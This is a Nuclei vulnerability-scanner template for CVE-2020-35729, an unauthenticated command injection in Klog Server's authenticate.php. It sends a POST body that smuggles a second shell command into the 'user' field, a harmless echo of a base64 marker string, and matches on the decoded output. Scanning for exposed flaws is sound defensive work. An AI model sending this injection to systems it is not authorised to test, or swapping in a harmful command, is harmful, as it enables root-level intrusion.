nuclei-templates/cves/2020/CVE-2020-35729.yaml

31 lines
1.2 KiB
YAML
Raw Normal View History

2021-02-26 11:40:25 +00:00
id: CVE-2020-35729
info:
name: Klog Server Unauthenticated Command Injection
author: dwisiswant0
severity: critical
reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
description: |
This template exploits an unauthenticated command injection vulnerability
in Klog Server versions 2.4.1 and prior.
The `authenticate.php` file uses the `user` HTTP POST parameter in a call
to the `shell_exec()` PHP function without appropriate input validation,
allowing arbitrary command execution as the apache user.
The sudo configuration permits the apache user to execute any command
as root without providing a password, resulting in privileged command
execution as root.
Originated from Metasploit module, copyright (c) space-r7.
2021-02-26 11:43:32 +00:00
tags: cve,cve2020,klog,rce
2021-02-26 11:40:25 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/actions/authenticate.php"
2021-02-26 11:41:58 +00:00
body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
2021-02-26 11:40:25 +00:00
matchers:
- type: word
words:
2021-02-26 11:41:58 +00:00
- "projectdiscovery.io" # from Base64 decoding payload